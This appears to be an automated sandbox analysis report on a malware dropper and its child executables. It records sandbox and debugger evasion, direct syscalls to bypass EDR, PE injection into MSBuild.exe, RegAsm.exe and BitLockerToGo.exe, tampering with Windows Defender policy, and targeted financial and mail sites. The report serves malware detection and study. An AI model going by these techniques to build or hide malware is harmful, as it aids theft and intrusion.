Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: 4MZEKMRe7m6bc8qivCccLsq8.exe, 0000000B.00000000.2312098635.00000000005A2000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: MIUNHETIAOPFBGBZVMCIBKMKSAFVNTGXOFM
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: VBoxService.exe
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: yHP2Z5SFUIZjI8pAKB_H3QUP.exe, 0000000C.00000000.2313037451.0000000000B82000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: carmO8a0VBurhRuvmcIN
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: svchost.exe, 00000004.00000002.3351871083.000002BAA7A02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: VMWare
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000003.2462703968.0000000001DFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: Lbg6Jgx2PuK0JimgGIFCI5UU.exe, 00000009.00000002.2606301405.0000000000C3C000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: #Windows 11 Microsoft Hyper-V Server

Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe

API call chain: ExitProcess graph end node

graph_8-6301

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Open window title or class name: regmonclass
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Open window title or class name: gbdyllo
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Open window title or class name: procmon_window_class
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Open window title or class name: ollydbg
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Open window title or class name: filemonclass
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Process queried: DebugPort
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Process queried: DebugPort
Source: C:\ProgramData\WinTrackerSP\WinTrackerSP.exe	Process queried: DebugObjectHandle

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe

Code function: 9_2_66635FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

9_2_66635FF0

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe

Code function: 9_2_665E0E40 LoadLibraryW,GetProcAddress,__Init_thread_footer,FreeLibrary,

9_2_665E0E40

Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6660B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		9_2_6660B66C
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Code function: 9_2_6660B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		9_2_6660B1F7

Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: yHP2Z5SFUIZjI8pAKB_H3QUP.exe PID: 2876, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3000000 protect: page execute and read and write
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Disables Windows Defender (deletes autostart)

Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe

Registry value deleted: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{929E38D7-F85C-4E9F-9205-1838BD20B49A}Machine\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtProtectVirtualMemory: Direct from: 0x140F3F370
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtProtectVirtualMemory: Direct from: 0x1417CF969
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtProtectVirtualMemory: Direct from: 0x7FF665F0AE38	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtProtectVirtualMemory: Direct from: 0x1417BB0DB
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtProtectVirtualMemory: Direct from: 0x7FF666189EAA	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtUnmapViewOfSection: Direct from: 0x7FF6661D6735	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtProtectVirtualMemory: Direct from: 0x7FF6661E237C	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtClose: Direct from: 0x7FF665F19F3F
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtUnmapViewOfSection: Direct from: 0x140F15A29
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtProtectVirtualMemory: Direct from: 0x7FF6661A4CBA	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtClose: Direct from: 0x1417BEBA3
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtProtectVirtualMemory: Direct from: 0x7FF66622C0E0	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtProtectVirtualMemory: Direct from: 0x1417B892B
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtProtectVirtualMemory: Direct from: 0x1415D4112
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtMapViewOfSection: Direct from: 0x7FF665F425C3	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtOpenFile: Direct from: 0x1417DFD15
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtProtectVirtualMemory: Direct from: 0x7FF665F1FCD5	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtProtectVirtualMemory: Direct from: 0x140F13954
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtProtectVirtualMemory: Direct from: 0x140F6B015
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtProtectVirtualMemory: Direct from: 0x7FF6661CB64B	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtProtectVirtualMemory: Direct from: 0x7FF666206B29	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtMapViewOfSection: Direct from: 0x140F47AFD
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtProtectVirtualMemory: Direct from: 0x7FF6661EE0EC	Jump to behavior
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtProtectVirtualMemory: Indirect: 0x7FF665E72B4C	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtProtectVirtualMemory: Direct from: 0x140F27503
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtProtectVirtualMemory: Indirect: 0x140EFC4F6
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtProtectVirtualMemory: Direct from: 0x7FF665E83DC5	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtProtectVirtualMemory: Direct from: 0x140F65004
Source: C:\Users\user\Desktop\1719859269.0326595_setup.exe	NtOpenFile: Direct from: 0x7FF6661F262F	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtProtectVirtualMemory: Direct from: 0x140F492EB
Source: C:\Users\user\Documents\SimpleAdobe\ZRPXsHAkSUQ1QmQI0EHaBnFQ.exe	NtProtectVirtualMemory: Direct from: 0x1417DC7D7

Injects a PE file into a foreign processes

Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3000000 value starts with: 4D5A
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 456000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: DC4008	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 425000
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42E000
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 643000
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: BB8008
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3000000
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2F6D008
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44E000
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 107D008

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\SimpleAdobe\4Q6k8SlqG7M24bYO3UgMWICf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 424 -ip 424
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 424 -s 284
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS188D.tmp\Install.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS1BC9.tmp\Install.exe	Process created: unknown unknown

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe

Code function: 9_2_6660B341 cpuid

9_2_6660B341

Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Code function: GetLocaleInfoA,		8_2_0040515C
Source: C:\Users\user\Documents\SimpleAdobe\H1pBxuA3W1wJGbhYT2DZXaLH.exe	Code function: GetLocaleInfoA,		8_2_004051A8

Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Documents\SimpleAdobe\IVTULQzdBmF3Bc0NeoxSnYvg.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Queries volume information: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\4MZEKMRe7m6bc8qivCccLsq8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Queries volume information: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yHP2Z5SFUIZjI8pAKB_H3QUP.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Queries volume information: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\yTXn1eeuAPe6JeFa5Kfn6hMY.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
